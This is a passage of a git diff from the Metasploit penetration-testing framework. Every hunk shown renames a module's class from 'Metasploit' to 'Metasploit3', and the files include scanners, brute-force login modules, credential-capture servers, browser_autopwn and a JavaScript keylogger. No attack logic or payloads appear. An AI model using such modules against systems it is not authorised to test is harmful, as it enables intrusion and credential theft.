Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/snmp/snmp_set.rb b/modules/auxiliary/scanner/snmp/snmp_set.rb index e25cc756ad..edd07e2785 100644 --- a/modules/auxiliary/scanner/snmp/snmp_set.rb +++ b/modules/auxiliary/scanner/snmp/snmp_set.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb b/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb index 75bd8b7804..445634756e 100644 --- a/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb +++ b/modules/auxiliary/scanner/snmp/ubee_ddw3611.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb b/modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb index 3171c01871..c6cf8702bd 100644 --- a/modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb +++ b/modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::SNMPClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb b/modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb index cb42ab478d..52becd24cc 100644 --- a/modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/cerberus_sftp_enumusers.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ssh/karaf_login.rb b/modules/auxiliary/scanner/ssh/karaf_login.rb index 8670f3c97c..be6c4539c9 100644 --- a/modules/auxiliary/scanner/ssh/karaf_login.rb +++ b/modules/auxiliary/scanner/ssh/karaf_login.rb @@ -8,7 +8,7 @@ require 'net/ssh' require 'metasploit/framework/login_scanner/ssh' require 'metasploit/framework/credential_collection' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::CommandShell diff --git a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb index 88d85dee3e..3379adad44 100644 --- a/modules/auxiliary/scanner/ssh/ssh_enumusers.rb +++ b/modules/auxiliary/scanner/ssh/ssh_enumusers.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'net/ssh' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb b/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb index beecb2e996..6a066ffef3 100644 --- a/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb +++ b/modules/auxiliary/scanner/ssh/ssh_identify_pubkeys.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'net/ssh' require 'sshkey' # TODO: Actually include this! -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::AuthBrute diff --git a/modules/auxiliary/scanner/ssh/ssh_login.rb b/modules/auxiliary/scanner/ssh/ssh_login.rb index c8f0f18aab..e6925f9660 100644 --- a/modules/auxiliary/scanner/ssh/ssh_login.rb +++ b/modules/auxiliary/scanner/ssh/ssh_login.rb @@ -8,7 +8,7 @@ require 'net/ssh' require 'metasploit/framework/login_scanner/ssh' require 'metasploit/framework/credential_collection' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::AuthBrute include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb b/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb index fd31314462..2fd040823b 100644 --- a/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb +++ b/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb @@ -8,7 +8,7 @@ require 'net/ssh' require 'metasploit/framework/login_scanner/ssh' require 'metasploit/framework/credential_collection' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::AuthBrute include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ssh/ssh_version.rb b/modules/auxiliary/scanner/ssh/ssh_version.rb index bffbc691fd..885d224e51 100644 --- a/modules/auxiliary/scanner/ssh/ssh_version.rb +++ b/modules/auxiliary/scanner/ssh/ssh_version.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'recog' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/ssl/openssl_ccs.rb b/modules/auxiliary/scanner/ssl/openssl_ccs.rb index 34229c7980..7b727ef94c 100644 --- a/modules/auxiliary/scanner/ssl/openssl_ccs.rb +++ b/modules/auxiliary/scanner/ssl/openssl_ccs.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb index 24212e1c07..409c8722ad 100644 --- a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb +++ b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb @@ -11,7 +11,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/steam/server_info.rb b/modules/auxiliary/scanner/steam/server_info.rb index 202194bd8b..398e0fb038 100644 --- a/modules/auxiliary/scanner/steam/server_info.rb +++ b/modules/auxiliary/scanner/steam/server_info.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/steam' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner include Rex::Proto::Steam diff --git a/modules/auxiliary/scanner/telephony/wardial.rb b/modules/auxiliary/scanner/telephony/wardial.rb index 9e1b71415b..18cd6912cc 100644 --- a/modules/auxiliary/scanner/telephony/wardial.rb +++ b/modules/auxiliary/scanner/telephony/wardial.rb @@ -34,7 +34,7 @@ class Object end end -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb b/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb index 2334d2181e..b6af840661 100644 --- a/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb +++ b/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Telnet include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb b/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb index b63138894b..2facedd4f1 100644 --- a/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb +++ b/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Telnet include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/telnet/telnet_login.rb b/modules/auxiliary/scanner/telnet/telnet_login.rb index bc7b3363c2..63dda3f8ab 100644 --- a/modules/auxiliary/scanner/telnet/telnet_login.rb +++ b/modules/auxiliary/scanner/telnet/telnet_login.rb @@ -7,7 +7,7 @@ require 'msf/core' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/telnet' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Telnet include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb b/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb index d4358964ba..a23e6058ef 100644 --- a/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb +++ b/modules/auxiliary/scanner/telnet/telnet_ruggedcom.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Telnet include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/telnet/telnet_version.rb b/modules/auxiliary/scanner/telnet/telnet_version.rb index 5118452a70..644a178b89 100644 --- a/modules/auxiliary/scanner/telnet/telnet_version.rb +++ b/modules/auxiliary/scanner/telnet/telnet_version.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Telnet include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb b/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb index 1e2dd3dcab..dc1e190457 100644 --- a/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb +++ b/modules/auxiliary/scanner/tftp/ipswitch_whatsupgold_tftp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/tftp/netdecision_tftp.rb b/modules/auxiliary/scanner/tftp/netdecision_tftp.rb index 7f35056943..fd8c131316 100644 --- a/modules/auxiliary/scanner/tftp/netdecision_tftp.rb +++ b/modules/auxiliary/scanner/tftp/netdecision_tftp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/tftp/tftpbrute.rb b/modules/auxiliary/scanner/tftp/tftpbrute.rb index df9b49dc67..29935dc352 100644 --- a/modules/auxiliary/scanner/tftp/tftpbrute.rb +++ b/modules/auxiliary/scanner/tftp/tftpbrute.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Scanner include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/udp_scanner_template.rb b/modules/auxiliary/scanner/udp_scanner_template.rb index 5c63de3491..07ec5c659d 100644 --- a/modules/auxiliary/scanner/udp_scanner_template.rb +++ b/modules/auxiliary/scanner/udp_scanner_template.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/upnp/ssdp_amp.rb b/modules/auxiliary/scanner/upnp/ssdp_amp.rb index b59d7e3f08..5d2217308d 100644 --- a/modules/auxiliary/scanner/upnp/ssdp_amp.rb +++ b/modules/auxiliary/scanner/upnp/ssdp_amp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Exploit::Capture include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/upnp/ssdp_msearch.rb b/modules/auxiliary/scanner/upnp/ssdp_msearch.rb index 1b4982ac81..0f7496a036 100644 --- a/modules/auxiliary/scanner/upnp/ssdp_msearch.rb +++ b/modules/auxiliary/scanner/upnp/ssdp_msearch.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::Report include Msf::Auxiliary::UDPScanner diff --git a/modules/auxiliary/scanner/vmware/esx_fingerprint.rb b/modules/auxiliary/scanner/vmware/esx_fingerprint.rb index f52a2f40b7..0cc62c9a60 100644 --- a/modules/auxiliary/scanner/vmware/esx_fingerprint.rb +++ b/modules/auxiliary/scanner/vmware/esx_fingerprint.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vmware/vmauthd_login.rb b/modules/auxiliary/scanner/vmware/vmauthd_login.rb index f879d08d2a..5844222e6c 100644 --- a/modules/auxiliary/scanner/vmware/vmauthd_login.rb +++ b/modules/auxiliary/scanner/vmware/vmauthd_login.rb @@ -7,7 +7,7 @@ require 'msf/core/exploit/tcp' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/vmauthd' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/vmware/vmauthd_version.rb b/modules/auxiliary/scanner/vmware/vmauthd_version.rb index a63d871998..28b6355385 100644 --- a/modules/auxiliary/scanner/vmware/vmauthd_version.rb +++ b/modules/auxiliary/scanner/vmware/vmauthd_version.rb @@ -5,7 +5,7 @@ require 'msf/core/exploit/tcp' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb b/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb index 835cf8934f..d8bb09b6c5 100644 --- a/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb +++ b/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/proto/ntlm/message' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::VIMSoap include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb b/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb index 4908feaeb3..3cd4b3563a 100644 --- a/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb +++ b/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/proto/ntlm/message' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::VIMSoap include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vmware/vmware_enum_users.rb b/modules/auxiliary/scanner/vmware/vmware_enum_users.rb index 0224b1e6e9..8189a9b495 100644 --- a/modules/auxiliary/scanner/vmware/vmware_enum_users.rb +++ b/modules/auxiliary/scanner/vmware/vmware_enum_users.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/proto/ntlm/message' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::VIMSoap include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb b/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb index 828ba06b66..45081e5019 100644 --- a/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb +++ b/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vmware/vmware_host_details.rb b/modules/auxiliary/scanner/vmware/vmware_host_details.rb index e731d22cb1..cd4cfb164c 100644 --- a/modules/auxiliary/scanner/vmware/vmware_host_details.rb +++ b/modules/auxiliary/scanner/vmware/vmware_host_details.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vmware/vmware_http_login.rb b/modules/auxiliary/scanner/vmware/vmware_http_login.rb index 660886b098..0225eddd6e 100644 --- a/modules/auxiliary/scanner/vmware/vmware_http_login.rb +++ b/modules/auxiliary/scanner/vmware/vmware_http_login.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/proto/ntlm/message' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::VIMSoap include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb b/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb index 13ce903430..de4f89435f 100644 --- a/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb +++ b/modules/auxiliary/scanner/vmware/vmware_screenshot_stealer.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vmware/vmware_server_dir_trav.rb b/modules/auxiliary/scanner/vmware/vmware_server_dir_trav.rb index bfd1bda6cd..68e1922d5e 100644 --- a/modules/auxiliary/scanner/vmware/vmware_server_dir_trav.rb +++ b/modules/auxiliary/scanner/vmware/vmware_server_dir_trav.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary # Exploit mixins should be called first include Msf::Exploit::Remote::HttpClient diff --git a/modules/auxiliary/scanner/vmware/vmware_update_manager_traversal.rb b/modules/auxiliary/scanner/vmware/vmware_update_manager_traversal.rb index 5d206d00d2..600db46d77 100644 --- a/modules/auxiliary/scanner/vmware/vmware_update_manager_traversal.rb +++ b/modules/auxiliary/scanner/vmware/vmware_update_manager_traversal.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vnc/vnc_login.rb b/modules/auxiliary/scanner/vnc/vnc_login.rb index ed28faf18f..91ec122893 100644 --- a/modules/auxiliary/scanner/vnc/vnc_login.rb +++ b/modules/auxiliary/scanner/vnc/vnc_login.rb @@ -8,7 +8,7 @@ require 'rex/proto/rfb' require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner/vnc' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/scanner/vnc/vnc_none_auth.rb b/modules/auxiliary/scanner/vnc/vnc_none_auth.rb index eb4f411355..e16a345997 100644 --- a/modules/auxiliary/scanner/vnc/vnc_none_auth.rb +++ b/modules/auxiliary/scanner/vnc/vnc_none_auth.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'rex/proto/rfb' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/voice/recorder.rb b/modules/auxiliary/scanner/voice/recorder.rb index 677163a7b6..0f4fe85d52 100644 --- a/modules/auxiliary/scanner/voice/recorder.rb +++ b/modules/auxiliary/scanner/voice/recorder.rb @@ -6,7 +6,7 @@ require 'msf/core' require 'fileutils' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Auxiliary::IAX2 diff --git a/modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb b/modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb index 9056346364..88914a5525 100644 --- a/modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb +++ b/modules/auxiliary/scanner/vxworks/wdbrpc_bootline.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::WDBRPC include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/vxworks/wdbrpc_version.rb b/modules/auxiliary/scanner/vxworks/wdbrpc_version.rb index 37d742e65c..655bfbf00b 100644 --- a/modules/auxiliary/scanner/vxworks/wdbrpc_version.rb +++ b/modules/auxiliary/scanner/vxworks/wdbrpc_version.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::WDBRPC include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb b/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb index fcf58e9145..05b76dd142 100644 --- a/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb +++ b/modules/auxiliary/scanner/winrm/winrm_auth_methods.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/proto/ntlm/message' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::WinRM include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/winrm/winrm_cmd.rb b/modules/auxiliary/scanner/winrm/winrm_cmd.rb index c890005405..a4ce2652f7 100644 --- a/modules/auxiliary/scanner/winrm/winrm_cmd.rb +++ b/modules/auxiliary/scanner/winrm/winrm_cmd.rb @@ -9,7 +9,7 @@ require 'rex/proto/ntlm/message' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::WinRM include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/winrm/winrm_login.rb b/modules/auxiliary/scanner/winrm/winrm_login.rb index ed5ebf893c..1871aa59d1 100644 --- a/modules/auxiliary/scanner/winrm/winrm_login.rb +++ b/modules/auxiliary/scanner/winrm/winrm_login.rb @@ -10,7 +10,7 @@ require 'metasploit/framework/credential_collection' require 'metasploit/framework/login_scanner' require 'metasploit/framework/login_scanner/winrm' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::WinRM include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/winrm/winrm_wql.rb b/modules/auxiliary/scanner/winrm/winrm_wql.rb index bdf0930115..7beaf89022 100644 --- a/modules/auxiliary/scanner/winrm/winrm_wql.rb +++ b/modules/auxiliary/scanner/winrm/winrm_wql.rb @@ -8,7 +8,7 @@ require 'msf/core' require 'rex/proto/ntlm/message' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::WinRM include Msf::Auxiliary::Report diff --git a/modules/auxiliary/scanner/x11/open_x11.rb b/modules/auxiliary/scanner/x11/open_x11.rb index 31f6ea1152..32912c464f 100644 --- a/modules/auxiliary/scanner/x11/open_x11.rb +++ b/modules/auxiliary/scanner/x11/open_x11.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Scanner diff --git a/modules/auxiliary/server/android_browsable_msf_launch.rb b/modules/auxiliary/server/android_browsable_msf_launch.rb index bb678ff06b..7d603eb953 100644 --- a/modules/auxiliary/server/android_browsable_msf_launch.rb +++ b/modules/auxiliary/server/android_browsable_msf_launch.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer diff --git a/modules/auxiliary/server/android_mercury_parseuri.rb b/modules/auxiliary/server/android_mercury_parseuri.rb index 4ecbd2379f..d152584e06 100644 --- a/modules/auxiliary/server/android_mercury_parseuri.rb +++ b/modules/auxiliary/server/android_mercury_parseuri.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/browser_autopwn.rb b/modules/auxiliary/server/browser_autopwn.rb index 5b1292d6b5..35a4fcc4cc 100644 --- a/modules/auxiliary/server/browser_autopwn.rb +++ b/modules/auxiliary/server/browser_autopwn.rb @@ -12,7 +12,7 @@ require 'msf/core' require 'rex/exploitation/js/detect' require 'rex/exploitation/jsobfu' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/auxiliary/server/browser_autopwn2.rb b/modules/auxiliary/server/browser_autopwn2.rb index bfcb777af3..1c28beee94 100644 --- a/modules/auxiliary/server/browser_autopwn2.rb +++ b/modules/auxiliary/server/browser_autopwn2.rb @@ -4,7 +4,7 @@ ## require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::BrowserAutopwn2 diff --git a/modules/auxiliary/server/capture/drda.rb b/modules/auxiliary/server/capture/drda.rb index 6e158b841d..970b8cda7f 100644 --- a/modules/auxiliary/server/capture/drda.rb +++ b/modules/auxiliary/server/capture/drda.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/ftp.rb b/modules/auxiliary/server/capture/ftp.rb index d2242624ab..667eca6a4a 100644 --- a/modules/auxiliary/server/capture/ftp.rb +++ b/modules/auxiliary/server/capture/ftp.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/http.rb b/modules/auxiliary/server/capture/http.rb index 2250629e8d..721835e278 100644 --- a/modules/auxiliary/server/capture/http.rb +++ b/modules/auxiliary/server/capture/http.rb @@ -7,7 +7,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/http_basic.rb b/modules/auxiliary/server/capture/http_basic.rb index 52fc9f4426..8e8db5c2ab 100644 --- a/modules/auxiliary/server/capture/http_basic.rb +++ b/modules/auxiliary/server/capture/http_basic.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/http_javascript_keylogger.rb b/modules/auxiliary/server/capture/http_javascript_keylogger.rb index 6ed4fa1e11..aefe8fce9c 100644 --- a/modules/auxiliary/server/capture/http_javascript_keylogger.rb +++ b/modules/auxiliary/server/capture/http_javascript_keylogger.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML diff --git a/modules/auxiliary/server/capture/http_ntlm.rb b/modules/auxiliary/server/capture/http_ntlm.rb index 70e284d106..9d775d940d 100644 --- a/modules/auxiliary/server/capture/http_ntlm.rb +++ b/modules/auxiliary/server/capture/http_ntlm.rb @@ -13,7 +13,7 @@ NTLM_CONST = Rex::Proto::NTLM::Constants NTLM_CRYPT = Rex::Proto::NTLM::Crypt MESSAGE = Rex::Proto::NTLM::Message -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::HttpServer::HTML include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/imap.rb b/modules/auxiliary/server/capture/imap.rb index 7069a2ff84..843ef0580b 100644 --- a/modules/auxiliary/server/capture/imap.rb +++ b/modules/auxiliary/server/capture/imap.rb @@ -6,7 +6,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Auxiliary::Report diff --git a/modules/auxiliary/server/capture/mssql.rb b/modules/auxiliary/server/capture/mssql.rb index a834a762a9..99885df4af 100644 --- a/modules/auxiliary/server/capture/mssql.rb +++ b/modules/auxiliary/server/capture/mssql.rb @@ -12,7 +12,7 @@ NTLM_CONST = Rex::Proto::NTLM::Constants NTLM_CRYPT = Rex::Proto::NTLM::Crypt MESSAGE = Rex::Proto::NTLM::Message -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include Msf::Exploit::Remote::TcpServer include Msf::Exploit::Remote::SMB::Server diff --git a/modules/auxiliary/server/capture/mysql.rb b/modules/auxiliary/server/capture/mysql.rb index c32b6620bd..a11ff87366 100644 --- a/modules/auxiliary/server/capture/mysql.rb +++ b/modules/auxiliary/server/capture/mysql.rb @@ -5,7 +5,7 @@ require 'msf/core' -class Metasploit < Msf::Auxiliary +class Metasploit3 < Msf::Auxiliary include 